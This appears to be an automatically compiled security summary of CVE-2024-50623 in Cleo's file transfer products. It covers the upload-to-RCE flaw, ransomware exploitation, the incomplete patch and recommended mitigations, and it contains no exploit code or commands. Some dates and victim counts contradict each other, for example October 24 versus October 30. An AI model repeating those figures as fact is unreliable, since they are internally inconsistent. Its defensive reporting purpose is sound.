Introduction
A critical zero-day vulnerability [1] [2] [4] [5] [6] [8], CVE-2024-50623 [1] [2] [3] [4] [5] [6] [7] [8], has been identified in Cleo’s file transfer software [8], affecting Harmony [2], VLTrader [2] [3] [4] [5] [6] [8], and LexiCom products prior to version 5.8.0.21 [4] [8]. This vulnerability poses a significant risk to enterprises by allowing unauthenticated remote code execution, which has already been exploited by threat actors, including the Termite ransomware group [4]. Despite initial mitigation efforts, the vulnerability persists [1] [2] [4] [5] [6] [7], necessitating further action from affected organizations.
Description
Security researchers have identified a critical zero-day vulnerability [6], CVE-2024-50623 [1] [2] [3] [4] [5] [6] [7] [8], in Cleo’s file transfer software [6] [7] [8], specifically affecting the Harmony [6], VLTrader [2] [3] [4] [5] [6] [8], and LexiCom products prior to version 5.8.0.21 [4] [8]. This vulnerability allows for unrestricted file uploads and downloads [8], potentially leading to unauthenticated remote code execution (RCE), posing a severe risk to enterprises utilizing Cleo’s software for secure file transfers [4]. Initially disclosed on October 30, 2024 [4], the vulnerability was categorized as a cross-site scripting issue (CWE-79) but has since been reclassified as an unrestricted file upload vulnerability (CWE-434) [5]. Exploitation of this flaw began on December 3, 2024, with a significant surge in attacks reported shortly thereafter, including those attributed to the Termite ransomware group, which has claimed responsibility for targeting at least 10 organizations across various sectors, such as consumer products [6] [8], trucking [2] [6] [8], shipping [2] [6] [8], and food industries [2]. Huntress has reported that mass exploitation has occurred in both unpatched and fully patched instances of the software, indicating a broader scope of compromise [4].
Cleo published a security advisory on October 24, recommending customers upgrade to version 5.8.0.21 to mitigate the vulnerability [6]. However, security firm Huntress has indicated that this version [5], along with all versions up to and including 5.8.0.23, remains vulnerable [5], as the patch introduced a validatePath function that does not adequately address all attack paths and may be bypassed. Researchers have developed a proof-of-concept exploit that has been shared with Cleo [3], confirming the issue [3], and the company is preparing a new CVE designation while working on a comprehensive patch. Cleo has acknowledged the critical nature of this vulnerability [5], stating it could allow unauthenticated users to execute arbitrary bash or PowerShell commands on affected systems [5].
Reports indicate that at least 24 businesses across various industries have been targeted, with over 1,700 vulnerable Cleo servers detected [4], primarily in the US [7] [8]. Censys reported 1,342 exposed instances of Harmony [8], VLTrader [2] [3] [4] [5] [6] [8], and LexiCom online [3] [8], with nearly 80% located in the US [8]. This highlights the broader scope of potential compromise, as Cleo serves over 4,200 customers, including notable companies like Illumina, New Balance [7], and Portable [7]. To mitigate risks [3] [5], Huntress has advised customers to remove affected products from public access and place them behind a firewall [6]. They also recommend disabling Cleo’s Autorun Directory to prevent further exploitation and monitoring installation directories for suspicious files, such as unauthorized XML files and logs showing unauthorized file imports or PowerShell execution.
Affected customers are urged to investigate their environments for suspicious activity dating back to at least December 3, 2024 [6], and Rapid7 has released detection rules to identify related threats [5]. Network indicators of compromise (IOCs) associated with the exploitation include specific IP addresses [5], further emphasizing the urgency for customers to assess their exposure to CVE-2024-50623 [5]. This incident underscores the increasing threats against managed file transfer (MFT) tools [4], with attackers targeting enterprise software that handles sensitive data transfer processes [4]. Organizations using Cleo’s products must implement mitigations and remain vigilant while awaiting a comprehensive patch [4]. Cleo has indicated that a new patch is forthcoming [1], but until then, disabling the autoruns feature is recommended to mitigate the attack surface [1], although this will not resolve the underlying arbitrary file-write vulnerability [1].
Conclusion
The discovery of CVE-2024-50623 highlights the critical vulnerabilities present in Cleo’s file transfer software, posing significant risks to enterprises. Despite initial patching efforts, the vulnerability remains exploitable [2], necessitating immediate action from affected organizations. Companies must implement recommended mitigations, such as removing affected products from public access and disabling the autoruns feature, while remaining vigilant for suspicious activity. The incident underscores the growing threats to managed file transfer tools and the need for robust security measures to protect sensitive data transfer processes. Cleo is working on a comprehensive patch, but until its release, organizations must take proactive steps to safeguard their systems.
References
[1] https://labs.watchtowr.com/cleo-cve-2024-50623/
[2] https://www.darkreading.com/cyberattacks-data-breaches/termite-ransomware-behind-cleo-zero-day-attacks
[3] https://www.csoonline.com/article/3621746/attackers-exploit-zero-day-rce-flaw-in-cleo-managed-file-transfer.html
[4] https://cybersecuritynews.com/cleo-zero-day-rce-vulnerability/
[5] https://www.rapid7.com/blog/post/2024/12/10/etr-widespread-exploitation-of-cleo-file-transfer-software-cve-2024-50623/
[6] https://www.infosecurity-magazine.com/news/zero-day-cleo-file-transfer/
[7] https://techcrunch.com/2024/12/10/hackers-are-exploiting-a-flaw-in-popular-file-transfer-tools-to-launch-mass-hacks-again/
[8] https://www.cybersecuritydive.com/news/flaw-cleo-file-transfer-software-exploitation/735191/
